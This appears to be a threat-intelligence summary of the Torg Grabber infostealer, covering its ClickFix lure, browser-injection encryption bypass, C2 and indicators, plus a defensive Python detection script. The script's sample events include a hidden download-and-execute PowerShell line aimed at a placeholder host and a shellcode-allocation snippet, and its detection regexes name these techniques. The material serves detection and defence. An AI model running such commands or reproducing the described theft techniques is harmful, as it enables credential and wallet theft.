Full Report
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets. [...]
Analysis Summary
# Tool/Technique: Torg Grabber
## Overview
Torg Grabber is a rapidly evolving information-stealing malware primarily focused on the exfiltration of cryptocurrency wallet data, credentials, and sensitive browser information. It is distinguished by its aggressive targeting of over 850 browser extensions and its frequent update cycle, with hundreds of unique samples observed within a three-month period.
## Technical Details
- **Type**: Information Stealer (Infostealer)
- **Platform**: Windows (Targets Chromium and Firefox-based browsers)
- **Capabilities**: Credential theft, crypto-wallet hijacking, App-Bound Encryption (ABE) bypass, file exfiltration, and remote shellcode execution.
- **First Seen**: December 2025
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link (delivers the victim to the ClickFix lure page)
- **TA0002 - Execution**
- T1204 - User Execution (ClickFix: the victim pastes and runs the supplied command)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1106 - Native API (direct syscalls)
- **TA0005 - Defense Evasion**
- T1620 - Reflective Code Loading (payloads executed in memory)
- T1497 - Virtualization/Sandbox Evasion (anti-analysis checks)
- **TA0006 - Credential Access**
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers (covers the App-Bound Encryption bypass)
- T1539 - Steal Web Session Cookie
- **TA0007 - Discovery**
- T1518.001 - Software Discovery: Security Software Discovery (scan for 24 antivirus products)
- T1082 - System Information Discovery (hardware fingerprinting)
- **TA0009 - Collection**
- T1005 - Data from Local System (recursive sweep of Desktop and Documents)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (HTTPS to Cloudflare-fronted domains)
## Functionality
### Core Capabilities
- **Mass Extension Targeting**: Targets 850 browser extensions in total: 728 cryptocurrency wallets, 103 password managers/2FA tools, and 19 note-taking apps.
- **Browser Data Theft**: Extracts history, cookies, and autofill data from 25 Chromium and 8 Firefox variants.
- **Application Targeting**: Steals data from Discord, Telegram, Steam, VPN clients, FTP clients, and desktop wallet apps.
- **System Profiling**: Creates hardware fingerprints and scans for 24 different antivirus products.
- **File Exfiltration**: Recursively searches and steals files from the `Desktop` and `Documents` folders.
### Advanced Features
- **App-Bound Encryption (ABE) Bypass**: Injects a DLL (a component branded "Underground") into the running browser process so that the request to Chrome's COM elevation service originates from the browser's own binary. ABE keys cookies and credentials to the browser, and the elevation service only decrypts for a caller it identifies as Chrome, so injection into the browser is what makes the bypass work.
- **Evasive Execution**: Uses direct syscalls to bypass security hooks and executes payloads entirely in memory via reflective loading.
- **Dynamic C2 Infrastructure**: Leverages Cloudflare-routed HTTPS connections with chunked data uploads; C2 domains are rotated weekly.
- **Encrypted Shellcode Execution**: Capable of executing remote shellcode delivered in ChaCha-encrypted and zlib-compressed formats.
## Indicators of Compromise
- **File Hashes**: *Not specifically listed in the article, but 334 unique samples identified (Dec 2025 - Feb 2026).*
- **Process Behaviors**:
- Malicious PowerShell execution following "ClickFix" social engineering prompts.
- Clipboard hijacking to replace wallet addresses or facilitate script execution.
- DLL injection into browser processes (`chrome.exe`, `msedge.exe`).
- **Network Indicators**:
- Exfiltration via HTTPS over Cloudflare.
- Custom encrypted TCP protocol (used by older samples; since replaced by the HTTPS channel).
- Telegram API usage (used by older samples; since replaced).
## Associated Threat Actors
- **Unattributed**: No operator has been named. At least 40 distinct "tags" (affiliate identifiers) have been documented across the samples, which points to an emerging Malware-as-a-Service (MaaS) model with multiple customers.
## Detection Methods
- **Behavioral Detection**: Alert on PowerShell launched from `explorer.exe` (Win+R) or a terminal with hidden-window, encoded or download-and-execute arguments, the pattern a ClickFix victim produces. Alert on remote thread creation or DLL loads into `chrome.exe`/`msedge.exe` from a non-browser process, which is how the ABE bypass reaches Chrome's elevation service.
- **Network Defense**: Inspect outbound HTTPS for large, chunked POST uploads to Cloudflare-fronted domains that are not on an approved list; weekly domain rotation means hostname blocklists alone lag behind.
- **Memory Scanning**: Identify shellcode or PE images resident in memory with no backing file on disk, the footprint of reflective loading.
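The behavioural and network detections above, and the process and network indicators listed under Indicators of Compromise, can be expressed as a small rule set. The following is an added example written for this summary, not code from the original report or from any vendor product; the events are constructed dictionaries shaped like flattened Sysmon records (process create, CreateRemoteThread), PowerShell 4104 script blocks and a proxy log line, and the field names, the upload-size threshold and the host allowlist are assumptions to be tuned per environment.

```python
"""Detection rules for the Torg Grabber behaviours summarised above.

Added example: illustrative logic only, not code from the original report.
Event records are constructed to resemble flattened Sysmon events (EventID 1
process create, EventID 8 CreateRemoteThread), PowerShell 4104 script blocks
and a proxy log line; field names are assumptions modelled on those schemas.
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# A ClickFix lure is pasted into the Win+R box or a terminal, so the shell is
# spawned by explorer.exe or cmd.exe rather than by a script host or installer.
CLICKFIX_PARENTS = {"explorer.exe", "cmd.exe"}
SUSPICIOUS_PS = re.compile(
    r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression"
    r"|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b",
    re.I,
)
# In-memory loading primitives that show up in 4104 script-block logs.
REFLECTIVE_PS = re.compile(r"VirtualAlloc|Reflection\.Assembly\]::Load|Marshal::Copy|LoadLibrary", re.I)
KNOWN_UPLOAD_HOSTS = {"onedrive.live.com", "drive.google.com"}  # assumed allowlist
CHUNKED_EXFIL_BYTES = 1 * 1024 * 1024  # assumed threshold: 1 MiB per POST


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (rule_name, event_id) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        kind = ev["kind"]
        if kind == "process_create":
            image, parent = basename(ev["image"]), basename(ev["parent_image"])
            if image in POWERSHELL and parent in CLICKFIX_PARENTS and SUSPICIOUS_PS.search(ev["command_line"]):
                hits.append(("clickfix_powershell", ev["id"]))
        elif kind == "create_remote_thread":
            src, dst = basename(ev["source_image"]), basename(ev["target_image"])
            # Browsers create threads in their own child processes; anything
            # else opening a thread in chrome.exe/msedge.exe is the injection
            # pattern the ABE bypass depends on.
            if dst in BROWSERS and src not in BROWSERS:
                hits.append(("browser_injection", ev["id"]))
        elif kind == "script_block":
            if REFLECTIVE_PS.search(ev["text"]) or SUSPICIOUS_PS.search(ev["text"]):
                hits.append(("reflective_powershell", ev["id"]))
        elif kind == "proxy":
            # Large chunked POSTs to a Cloudflare-fronted host that nobody approved.
            if (ev["method"] == "POST" and ev.get("chunked") and ev["bytes_out"] >= CHUNKED_EXFIL_BYTES
                    and ev["host"] not in KNOWN_UPLOAD_HOSTS and ev.get("cdn") == "cloudflare"):
                hits.append(("chunked_cdn_upload", ev["id"]))
    return hits


# Constructed sample telemetry: one true positive and one benign look-alike per rule.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix)"'},
    {"id": 2, "kind": "process_create",  # scheduled admin task, benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"id": 3, "kind": "create_remote_thread",
     "source_image": r"C:\Users\u\AppData\Local\Temp\svc.exe",
     "target_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"id": 4, "kind": "create_remote_thread",  # browser spawning its own renderer, benign
     "source_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"id": 5, "kind": "script_block",
     "text": "$buf = [Win32]::VirtualAlloc(0, $sc.Length, 0x3000, 0x40)"},
    {"id": 6, "kind": "script_block",  # ordinary admin one-liner, benign
     "text": r"Get-ChildItem C:\Users -Recurse | Measure-Object"},
    {"id": 7, "kind": "proxy", "method": "POST", "host": "update-cdn.example.invalid",
     "cdn": "cloudflare", "chunked": True, "bytes_out": 3_500_000},
    {"id": 8, "kind": "proxy", "method": "POST", "host": "drive.google.com",  # approved upload
     "cdn": "google", "chunked": True, "bytes_out": 50_000_000},
]

if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"{rule:22s} event {event_id}")
```

Each rule pairs with a benign look-alike in the sample set to show where the false-positive boundary sits: PowerShell from `svchost.exe`, a browser threading into itself, an admin one-liner and an upload to an approved host all pass. The `cdn` field stands in for whatever enrichment (ASN or IP-range lookup) the proxy attaches; without it the chunked-upload rule degrades to a plain size threshold.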
## Mitigation Strategies
- **User Education**: Train users to recognize "ClickFix" tactics where sites claim a browser error exists and provide a "fix" via a PowerShell command string.
- **System Hardening**: Enforce PowerShell Constrained Language Mode through AppLocker or WDAC (set on its own it is trivially bypassed), and enable Script Block Logging, Module Logging and transcription so that the ClickFix command and any reflectively loaded payload are recorded.
- **Access Control**: Restrict the ability of standard users to execute administrative commands or interact with sensitive system COM objects.
- **Browser Security**: Use browser policies to restrict the installation of unapproved or sideloaded extensions.
## Related Tools/Techniques
- **ClickFix**: The primary initial access technique.
- **VoidStealer**: Shares similar methods for extracting Chrome master keys via debugger/COM tricks.
- **Underground**: A standalone component/tool used by Torg Grabber for browser data extraction.